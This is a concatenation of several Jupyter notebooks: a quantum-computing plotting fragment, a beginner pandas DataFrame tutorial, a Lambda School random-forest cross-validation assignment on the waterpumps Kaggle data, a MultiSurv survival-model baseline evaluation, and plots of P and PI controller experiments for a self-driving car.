plt.xticks([i for i in range(len(means))], precision, size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.03, 0.25])
plt.yticks(size=14)
plt.ylabel(r'$p$', fontsize=16)
plt.legend(fontsize=14)
plt.title('Hybrid PBC - Toy Example 2 (1 virtual qubit)', fontsize=18)
# Lower subfigure (left)
subplot = subfigs[1].add_subplot(121)
plt.bar([i for i in range(4)],
heights[0:4],
width=0.8,
bottom=bot_bar[0:4],
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(4)],
means[0:4],
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(4)], [exact_value for _ in range(4)],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(4)],
means[0:4],
yerr=precision[0:4],
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 3.75])
plt.xticks([i for i in range(4)], precision[0:4], size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.09, 0.19])
plt.yticks(np.arange(0.09, 0.191, 0.01),
[round(i, 3) for i in np.arange(0.09, 0.191, 0.01)],
size=14)
plt.ylabel(r'$p$', fontsize=16)
# Lower subfigure (right)
subplot = subfigs[1].add_subplot(122)
plt.bar([i for i in range(4)],
heights[3:],
width=0.8,
bottom=bot_bar[3:],
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(4)],
means[3:],
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(4)], [exact_value for _ in range(4)],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(4)],
means[3:],
yerr=precision[3:],
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 3.75])
plt.xticks([i for i in range(4)], precision[3:], size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.09, 0.19])
plt.yticks(np.arange(0.09, 0.191, 0.01),
[round(i, 3) for i in np.arange(0.09, 0.191, 0.01)],
size=14)
plt.ylabel(r'$p$', fontsize=16)
fig.savefig("Probability_vs_precision.pdf", bbox_inches='tight')
plt.show()
# -
|
PBComp/ToyExample2/output-hybrid/Result_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/fabioeomedeiros/Data-Science-Base/blob/main/04_Pandas.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="X1g5ySprmExO"
# ## Data Frame
# + colab={"base_uri": "https://localhost:8080/"} id="g6dwYHTChpqw" outputId="2a513866-2635-473a-d7da-77cf657df1ae"
import pandas as pd
import numpy as np
alunos_dict = {'Nome': ['Ricardo', 'Pedro', 'Roberto', 'Carlos'],
'Notas': [4.0, 9.0, 5.5, 9.0],
'Aprovado': ['N', 'S', 'N', 'S']}
print(alunos_dict)
print(type(alunos_dict))
# + colab={"base_uri": "https://localhost:8080/"} id="mTOkbHWajO8f" outputId="cbf780fc-ff57-41bc-ea45-6416beb3888c"
alunos_df = pd.DataFrame(alunos_dict)
print(alunos_df)
print(type(alunos_df))
# + [markdown] id="7CHp91S2mAUY"
# ### Data Frame Functions
# + colab={"base_uri": "https://localhost:8080/"} id="Pp02fRupk9xv" outputId="d63b51e3-4460-4073-f41d-9351131d2549"
print(alunos_df)
print(alunos_df.shape) # number of rows and columns in the DataFrame
print(alunos_df.describe()) # summary statistics of the DataFrame
# + [markdown] id="GUEewi9pnwMj"
# ### Filtering Rows and Columns
# + colab={"base_uri": "https://localhost:8080/"} id="aYNcmvsgnvt0" outputId="2a0a8cf8-2200-4700-9479-6950cdea39db"
print(alunos_df['Nome']) # select a column by its key
# + colab={"base_uri": "https://localhost:8080/"} id="3f3a--97oiMW" outputId="579d77a3-fc47-49d7-f346-34ce52919f39"
print(alunos_df.loc[[0]]) # select rows with loc() and row index/indices
print(alunos_df.loc[[1, 3]])
print(alunos_df.loc[[2, 0]])
print(alunos_df.loc[0:2])
# + colab={"base_uri": "https://localhost:8080/", "height": 111} id="lW0Y2THwp1E-" outputId="9b8d006c-9d05-48b8-bc64-e9f12b596379"
alunos_df.loc[alunos_df['Notas'] == 9] # filter rows by a condition on a column
# + [markdown] id="fjNj1HWpr3wA"
# ### Building Other Data Frames
# + colab={"base_uri": "https://localhost:8080/"} id="01gDfvIDr9ta" outputId="81673024-173f-4aed-c56f-e3eb7032f173"
# print(alunos_df['Nome'])
# print(alunos_df.loc[2:3])
# print(alunos_df.loc[alunos_df['Aprovado'] == 'S'])
# DataFrame of approved students
alunos_aprovados_df = alunos_df.loc[alunos_df['Aprovado'] == 'S']
print(alunos_aprovados_df)
print()
# DataFrame of failed students
alunos_reprovados_df = alunos_df.loc[alunos_df['Aprovado'] == 'N']
print(alunos_reprovados_df)
print()
# DataFrame of students with grades at or above the mean
alunos_media_df = alunos_df.loc[alunos_df['Notas'] >= alunos_df['Notas'].mean()]
print(alunos_media_df)
print(f"Mean = {alunos_df['Notas'].mean()}")
|
04_Pandas.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Samuel-Egbert31415/Breast_Cancer_Metabric/blob/master/LS_DS_223_assignment_flexed.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="WmkBtVFZiNlM"
# Lambda School Data Science
#
# *Unit 2, Sprint 2, Module 3*
#
# ---
# + [markdown] id="6e-FdAl0iNlR"
# # Cross-Validation
#
#
# ## Assignment
# - [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
# - [ ] Continue to participate in our Kaggle challenge.
# - [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
# - [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
# - [ ] Commit your notebook to your fork of the GitHub repo.
#
#
# **You can't just copy** from the lesson notebook to this assignment.
#
# - Because the lesson was **regression**, but the assignment is **classification.**
# - Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
#
# So you will have to adapt the example, which is good real-world practice.
#
# 1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
# 2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
# 3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
# 4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
#
#
#
# ## Stretch Goals
#
# ### Reading
# - <NAME>, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
# - <NAME>, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
# - <NAME>, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
# - <NAME>, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
# - <NAME>, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
#
# ### Doing
# - Add your own stretch goals!
# - Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
# - In addition to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
# - _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
#
# > You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
#
# The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
#
# + [markdown] id="pz4COPuJiNlS"
# ### BONUS: Stacking!
#
# Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
#
# ```python
# import pandas as pd
#
# # Filenames of your submissions you want to ensemble
# files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
#
# target = 'status_group'
# submissions = (pd.read_csv(file)[[target]] for file in files)
# ensemble = pd.concat(submissions, axis='columns')
# majority_vote = ensemble.mode(axis='columns')[0]
#
# sample_submission = pd.read_csv('sample_submission.csv')
# submission = sample_submission.copy()
# submission[target] = majority_vote
# submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
# ```
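The mode-based majority vote above can be sketched self-contained, using hypothetical in-memory predictions instead of submission CSV files:

```python
import pandas as pd

# hypothetical predictions from three submissions for the same three rows
preds = [
    ['functional', 'non functional', 'functional'],
    ['functional', 'non functional', 'non functional'],
    ['non functional', 'functional', 'functional'],
]

# one column per submission; the mode along columns is the majority label per row
ensemble = pd.concat([pd.Series(p) for p in preds], axis='columns')
majority_vote = ensemble.mode(axis='columns')[0]
```

With these inputs, each row has a clear majority, so `mode` returns a single label per row; with ties, `mode` returns multiple columns and `[0]` keeps the first (lexicographically smallest) one.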
# + id="W3xS_hUDiNlS"
# %%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
# !pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
# + id="Nn4P7LZliNlT"
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
# + [markdown] id="BGif1Dp0izKw"
# #I. Wrangle
# + colab={"base_uri": "https://localhost:8080/"} id="YlIlLyeJiNlT" outputId="979160fa-0e88-4164-fe5b-4ff54ed4d584"
import category_encoders as ce
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.impute import SimpleImputer
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
def wrangle(X):
"""Wrangles train, validate, and test sets in the same way"""
X = X.copy()
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Drop duplicate columns
duplicate_columns = ['quantity_group']
X = X.drop(columns=duplicate_columns)
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these like null values
X['latitude'] = X['latitude'].replace(-2e-08, np.nan)
# When columns have zeros and shouldn't, they are like null values
cols_with_zeros = ['construction_year', 'longitude', 'latitude', 'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
return X
# + id="HUlwfmB_i9VS"
#apply the wrangle function to the test and train sets
train_df = wrangle(train)
# + id="vCBWVoZAvcTC"
test_df = wrangle(test)
# + [markdown] id="t7rfthR8jNTX"
# #II. Split Data
# + id="7Nphc0oJjBiT"
target = 'status_group'
X_train = train_df.drop('status_group', axis = 1)
y_train = train_df['status_group']
#Since we are doing K-fold validation, we don't need to manually create a validation set
# + id="6PVUsOklvMLj"
X_test = test_df
# + [markdown] id="6ixK7MlykKDw"
# #III. Build Model
# + id="c2GFbImPjZl6"
#Import statements
#Since we are doing classification, not regression, we will import the machinery needed for Random Forest
from sklearn.pipeline import make_pipeline
from category_encoders import OrdinalEncoder
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
import category_encoders as ce
from sklearn.model_selection import cross_val_score
rf_model = make_pipeline(ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=42))
# + id="ds2XlIQTlUXx"
rfmodel_cvs = cross_val_score(rf_model, X_train, y_train, cv=5, n_jobs=-1)
# + colab={"base_uri": "https://localhost:8080/"} id="ukJBx3wJmNlL" outputId="37e05e84-1116-494c-bc14-b35a495f77d7"
print("random forest classifier:")
print("cross validation score series is", rfmodel_cvs)
print("cross validation score mean is", rfmodel_cvs.mean())
print("cross validation score standard deviation is", rfmodel_cvs.std())
# + [markdown] id="DhYDpL6smj7P"
# #IV. Tune Model
# + id="fZ1xw7jempLR"
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
import numpy as np
# + id="kZNUUMJumuaa"
#setting some hyper-parameters to be modified
paras = {'randomforestclassifier__n_estimators': np.arange(20, 65, 22),
'randomforestclassifier__max_depth': np.arange(10, 31, 10),
'randomforestclassifier__max_samples': np.arange(0.3, 0.71, 0.2)}
rf_gs = GridSearchCV(rf_model, paras, cv=5, n_jobs=-1, verbose=1)
# + colab={"base_uri": "https://localhost:8080/"} id="1-upeCcbne1D" outputId="b156bba7-147e-421b-b0d3-ca7ca79aad01"
rf_gs.fit(X_train, y_train)
# + colab={"base_uri": "https://localhost:8080/", "height": 565} id="CX9hNAy9nwDi" outputId="356f72ea-ec05-4f3c-c134-aa090cbb735a"
pd.DataFrame(rf_gs.cv_results_).sort_values(by='mean_test_score', ascending=False).T
# + colab={"base_uri": "https://localhost:8080/"} id="OnaCxxRNpUnR" outputId="76cf95cb-2c4a-4f43-cf55-b253f37bd51d"
rf_gs.best_estimator_
# + colab={"base_uri": "https://localhost:8080/"} id="2W136HYVpY4w" outputId="702f9d96-d5ae-4309-d932-f3ada6d7d51e"
rf_gs.best_score_
# + colab={"base_uri": "https://localhost:8080/"} id="pjhspr7gpaXK" outputId="dbf774aa-b07a-497d-97cf-c3ee2b08313c"
rf_gs.best_params_
# + id="6HjuA6t2rB1T"
#Let's try the same with randomized search
# + id="Fg4_QexxrGRQ"
rf_rs = RandomizedSearchCV(rf_model, param_distributions=paras, n_iter=3, cv=5, n_jobs=-1, verbose=1)
# + colab={"base_uri": "https://localhost:8080/"} id="o2Fnm4tXrKdB" outputId="b263d030-503e-4cf9-aa0d-14c1ee8dbbab"
rf_rs.fit(X_train, y_train)
# + colab={"base_uri": "https://localhost:8080/"} id="iVD_xJNJrO7E" outputId="805fff17-279b-4b0e-ae73-1bd36daff219"
rf_rs.best_score_
# + id="bkljdaj6riKy"
#Lower than our grid search, but much faster
# + [markdown] id="JbCYtSUyrqpn"
# #V. Visualize
# + colab={"base_uri": "https://localhost:8080/", "height": 283} id="NcLPuFMsrmm6" outputId="db23ae50-a7c6-4313-90c0-4a31de717982"
importances = rf_gs.best_estimator_.named_steps['randomforestclassifier'].feature_importances_
features = X_train.columns
pd.Series(importances, index=features).sort_values().tail(10).plot(kind='barh')
# + [markdown] id="1J_yBMHqsnm3"
# #VI. Kaggle
# + id="kq7IpC-htNoi"
X_test = wrangle(test)
# # Makes a dataframe with two columns, id and status_group,
# # and writes to a csv file, without the index
y_pred = rf_gs.predict(X_test)
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission.to_csv('your-submission-filename.csv', index=False)
# + colab={"base_uri": "https://localhost:8080/", "height": 407} id="O5nGvEWXtb6K" outputId="d53fe9bf-d0e2-4f09-a2a6-db1159343c84"
submission
# + id="7p2R6CD2teIh"
submission.to_csv('2020-01-20_kaggle_submission.csv', index=False)
# + id="1OC8218UsmwN"
|
LS_DS_223_assignment_flexed.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <a id='Top'></a>
#
# # Unimodal inputs<a class='tocSkip'></a>
#
# Evaluation metric results for MultiSurv with unimodal data inputs compared with baseline models.
# + code_folding=[]
# %load_ext autoreload
# %autoreload 2
# %load_ext watermark
import sys
import os
import copy
from IPython.display import clear_output
import ipywidgets as widgets
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
# Make modules in "src" dir visible
project_dir = os.path.split(os.getcwd())[0]
if project_dir not in sys.path:
sys.path.append(os.path.join(project_dir, 'src'))
import dataset
import utils
matplotlib.style.use('multisurv.mplstyle')
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"><li><span><a href="#Input-data" data-toc-modified-id="Input-data-1"><span class="toc-item-num">1 </span>Input data</a></span></li><li><span><a href="#Dimensionality-reduction" data-toc-modified-id="Dimensionality-reduction-2"><span class="toc-item-num">2 </span>Dimensionality reduction</a></span></li><li><span><a href="#Tune-models" data-toc-modified-id="Tune-models-3"><span class="toc-item-num">3 </span>Tune models</a></span></li><li><span><a href="#Evaluate" data-toc-modified-id="Evaluate-4"><span class="toc-item-num">4 </span>Evaluate</a></span><ul class="toc-item"><li><span><a href="#Write-to-results-table" data-toc-modified-id="Write-to-results-table-4.1"><span class="toc-item-num">4.1 </span>Write to results table</a></span></li></ul></li></ul></div>
# -
DATA = utils.INPUT_DATA_DIR
# ## Functions<a class='tocSkip'></a>
def dataset_to_df(pytorch_dataset, modality):
data_dict = {'time': [],
'event': [],
'patient_id': []}
n_vars = {
# 'clinical': 15,
'clinical': 10,
'mRNA': 1000,
'miRNA': 1881,
'DNAm': 5000,
'CNV': 2000
}
for i in range(n_vars[modality]):
data_dict[str(i)] = []
for i, patient_data in enumerate(pytorch_dataset):
data, time, event, pid = patient_data
print('\r' + f'Load all patient data: {str((i + 1))}/{len(pytorch_dataset)} ',
end='')
data_dict['time'].append(time)
data_dict['event'].append(event)
data_dict['patient_id'].append(pid)
if modality == 'clinical':
for j, x in enumerate(data[modality][0]):
data_dict[str(j)].append(int(x))
for x in data[modality][1]:
j += 1
data_dict[str(j)].append(round(float(x), 6))
elif modality == 'CNV':
for j, x in enumerate(data[modality]):
data_dict[str(j)].append(int(x))
else:
for j, x in enumerate(data[modality]):
data_dict[str(j)].append(round(float(x), 6))
print()
df = pd.DataFrame.from_dict(data_dict)
df.set_index('patient_id', inplace=True)
return df
# # Input data
modality = widgets.Select(
options=['clinical', 'mRNA', 'DNAm', 'miRNA', 'CNV'],
index=0,
rows=5,
description='Input data',
disabled=False
)
display(modality)
dataloaders = utils.get_dataloaders(
data_location=DATA,
labels_file='../data/labels.tsv',
modalities=[modality.value],
# wsi_patch_size=299,
# n_wsi_patches=5,
batch_size=256,
# exclude_patients=exclude_cancers
return_patient_id=True
)
# +
# %%time
data_groups = ['train', 'val', 'test']
data_dfs = {
x: dataset_to_df(pytorch_dataset=dataloaders[x].dataset,
modality=modality.value)
for x in data_groups
}
print()
print()
# -
# One-hot encode categorical variables (present in clinical and CNV data)
if modality.value in ['clinical', 'CNV']:
if modality.value == 'clinical':
# cols = [str(x) for x in range(14)]
cols = [str(x) for x in range(9)]
elif modality.value == 'CNV':
cols = data_dfs['train'].columns[2:]
# Convert index to regular column
for group in data_groups:
data_dfs[group].reset_index(level=['patient_id'], inplace=True)
temp = pd.get_dummies(
pd.concat([data_dfs['train'], data_dfs['val'], data_dfs['test']], keys=[0, 1, 2]),
columns=cols, drop_first=True)
data_dfs['train'], data_dfs['val'], data_dfs['test'] = temp.xs(0), temp.xs(1), temp.xs(2)
# Put index back
for group in data_groups:
data_dfs[group].set_index('patient_id', inplace=True)
data_dfs['train'].shape
data_dfs['val'].shape
data_dfs['test'].shape
data_dfs['test'].head(3)
# # Dimensionality reduction
#
# Reduce dimensions to speed up classical algorithms.
# +
def reduce_dim(train, val, test, n):
pca = PCA(n_components=n)
pca.fit(train)
train = pca.transform(train)
val = pca.transform(val)
test = pca.transform(test)
return train, val, test
if modality.value != 'clinical': # 52 variables only
pca = copy.deepcopy(data_dfs)
# Get components
pca['train'], pca['val'], pca['test'] = reduce_dim(
data_dfs['train'].iloc[:, 2:],
data_dfs['val'].iloc[:, 2:],
data_dfs['test'].iloc[:, 2:], 50)
# Add labels back
for group in data_groups:
pca[group] = pd.concat(
[data_dfs[group].iloc[:, :2],
pd.DataFrame(pca[group]).set_index(data_dfs[group].index)], axis=1)
# -
# # Tune models
#
# * CPH ([Cox, 1972](https://www.jstor.org/stable/2985181?seq=1));
# * RSF ([Ishwaran *et al.*, 2008](https://arxiv.org/abs/0811.1645));
# * DeepSurv ([Katzman *et al.*, 2018](https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0482-1));
# * CoxTime ([Kvamme *et al.*, 2019](http://jmlr.org/papers/volume20/18-424/18-424.pdf));
# * DeepHit ([Lee *et al.*, 2018](http://medianetlab.ee.ucla.edu/papers/AAAI_2018_DeepHit));
# * MTLR ([Fotso, 2018](https://arxiv.org/abs/1801.05512));
# * Nnet-survival ([Gensheimer and Narasimhan, 2019](https://peerj.com/articles/6257/); [Kvamme and Borgan, 2019](https://arxiv.org/abs/1910.06724)).
# +
pycox_methods = ['DeepSurv', 'CoxTime', 'DeepHit', 'MTLR', 'Nnet-survival']
methods = ['CPH', 'RSF'] + pycox_methods
algorithm = widgets.Select(
options=methods,
index=0,
rows=len(methods),
description='Input data',
disabled=False
)
display(algorithm)
# -
def prepare_data(data, modality, algorithm):
data = data_dfs # full data (note: overrides the passed-in `data` argument)
description = f'full {modality} data'
if algorithm in ['CPH', 'RSF']:
if modality != 'clinical':
data = pca # PCA-decomposed data
description = f'reduced {modality} data (PCA)'
return data, description
# Get data
data, data_name = prepare_data(data_dfs, modality=modality.value, algorithm=algorithm.value)
# +
# Fit model
print(f'Fitting {algorithm.value} model on {data_name}...')
print()
if algorithm.value == 'CPH':
baseline = utils.Baselines(algorithm.value, data)
baseline.fit(show_progress=False, step_size=1.0)
elif algorithm.value == 'RSF':
baseline = utils.Baselines(algorithm.value, data, n_trees=50)
baseline.fit()
elif algorithm.value in pycox_methods:
# n_neurons = [32, 32]
n_neurons = [64, 32]
# n_neurons = [128, 64]
# n_neurons = [128, 64, 32]
best_baseline = baseline  # keep the previously fitted model before refitting (assumes a prior run of this cell)
baseline = utils.Baselines(algorithm.value, data, n_neurons=n_neurons)
baseline.fit(batch_size=256, verbose=True)
# -
if algorithm.value in pycox_methods:
_ = baseline.training_log.plot()
else:
clear_output()
# +
# %%time
print(f'{algorithm.value} model fit on {data_name}...')
print()
check_results = {'train': None, 'val': None}
for group in check_results.keys():
print(f'~ {group} ~')
performance = utils.Evaluation(model=baseline.model, dataset=baseline.data[group])
performance.compute_metrics()
performance.show_results()
print()
# +
# %%time
print(f'{algorithm.value} model fit on {data_name}...')
print()
check_results = {'train': None, 'val': None}
for group in check_results.keys():
print(f'~ {group} ~')
performance = utils.Evaluation(model=best_baseline.model, dataset=best_baseline.data[group])
performance.compute_metrics()
performance.show_results()
print()
# -
# # Evaluate
# + active=""
# print(best_baseline.model.net)
# +
# %%time
baseline = best_baseline
performance = utils.Evaluation(model=baseline.model, dataset=baseline.data['test'])
performance.run_bootstrap(n=1000)
print()
# -
print(f'>> {algorithm.value}: {modality.value} <<')
print()
performance.show_results()
# ## Write to results table
results = utils.ResultTable()
results.write_result_dict(result_dict=performance.format_results(),
algorithm=algorithm.value,
data_modality=modality.value)
results.table
# # Watermark<a class='tocSkip'></a>
# %watermark --iversions
# %watermark -v
print()
# %watermark -u -n
# [Top of the page](#Top)
|
figures_and_tables/table-baseline_evaluation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CAN Self-Driving Car Experiments
# ## 0. Initialize Settings
#
# ```python
# distance_2_tangent: 20
# angle_at_tangent: 0.4
# ```
#
# - 53 px ≈ 12.5 cm
# - 1 px ≈ 0.2358 cm
# - 1 time step (ts) = 0.2 s
# +
import matplotlib.pyplot as plt
import numpy as np
TIME_CONVERTER = 0.2
DIS_CONVERTER = 0.2358
# -
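The two constants above convert recorded pixel distances and time steps into physical units; they are defined here but never applied explicitly in the cells below. A minimal sketch of the conversion (the 53 px input is the calibration distance quoted above; other values are illustrative):

```python
TIME_CONVERTER = 0.2     # seconds per time step
DIS_CONVERTER = 0.2358   # centimeters per pixel

def to_physical(timesteps, pixels):
    """Convert simulator units (time steps, pixels) to (seconds, centimeters)."""
    return timesteps * TIME_CONVERTER, pixels * DIS_CONVERTER

# 200 recorded time steps and the 53 px calibration distance
seconds, cm = to_physical(200, 53)
```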
# ## 1. P-Controller
# record loading
dis_rec_list = np.zeros((10, 200))
for i in range(10):
cur_rec = np.load('./p-controller/record-' + str(i+1) + '.npy')
dis_rec_list[i] = cur_rec[:200, 0]
for i, rec in enumerate(dis_rec_list):
plt.plot(rec)
plt.title('Test Case ' + str(i+1))
plt.xlabel('time step')
plt.ylabel('distance to tangent')
# plt.show()
plt.figure(0)
for rec in dis_rec_list:
plt.title('All Test Cases')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(rec)
# +
dis_mean_list = np.mean(dis_rec_list, axis=0)
dis_max_list = np.max(dis_rec_list, axis=0)
dis_min_list = np.min(dis_rec_list, axis=0)
plt.title('Mean Case')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(dis_mean_list)
x = np.arange(len(dis_mean_list))  # time-step axis (x was previously undefined in this cell)
plt.fill_between(x, dis_max_list, dis_min_list, color='grey', alpha=0.5)
# -
# ***
# ## 2. PI-Controller
dis_rec_pi_list = np.zeros((10, 200))
for i in range(10):
cur_rec = np.load('./pi-controller/record-pi-' + str(i+1) + '.npy')
dis_rec_pi_list[i] = cur_rec[:200, 0]
for i, rec in enumerate(dis_rec_pi_list):
plt.plot(rec)
plt.title('PI Test Case ' + str(i+1))
plt.xlabel('time step')
plt.ylabel('distance to tangent')
# plt.show()
plt.figure(1)
for rec in dis_rec_pi_list:
plt.title('PI All Test Cases')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(rec)
# +
dis_mean_pi = np.mean(dis_rec_pi_list, axis=0)
dis_max_pi = np.max(dis_rec_pi_list, axis=0)
dis_min_pi = np.min(dis_rec_pi_list, axis=0)
# Plot lines
x = np.arange(0, 200, 1)
mean_line, = plt.plot(x, dis_mean_pi, label='mean')
# max_line, = plt.plot(x, dis_max_pi, label='max')
# min_line, = plt.plot(x, dis_min_pi, label='min')
# plt.legend(handles=[mean_line, max_line, min_line])
plt.fill_between(x, dis_max_pi, dis_min_pi, color='grey', alpha=0.5)
# -
# ***
# ## 3. Comparison
# +
plt.figure(2)
p_line, = plt.plot(dis_mean_list, label='P-Controller')
pi_line, = plt.plot(dis_mean_pi, label='PI-Controller')
plt.legend(handles=[p_line, pi_line])
plt.fill_between(x, dis_max_list, dis_min_list, color='blue', alpha=0.3)
plt.fill_between(x, dis_max_pi, dis_min_pi, color='green', alpha=0.3)
# -
# ## 4. Learning Process
# ## 4.1 PI Controller: Performance over Time
its = [5, 9, 50]
l = [None, None, None]
plt.figure(10)
plt.title('PI Controller Learning process')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
for inx, i in enumerate(its):
rec_list = np.zeros((5, 400))
for t in range(5):
rec = np.load('./learning-process/pi-it-' + str(i) + '-' + str(t+1) + '.npy')
rec_list[t] = rec[:400, 0]
l[inx], = plt.plot(np.mean(rec_list, axis=0), label='the ' + str(i) + 'th iteration')
rec_max = np.max(rec_list, axis=0)
rec_min = np.min(rec_list, axis=0)
plt.fill_between(np.arange(400), rec_max, rec_min, color='grey', alpha=0.3)
plt.legend(handles=[l[0], l[1], l[2]])
|
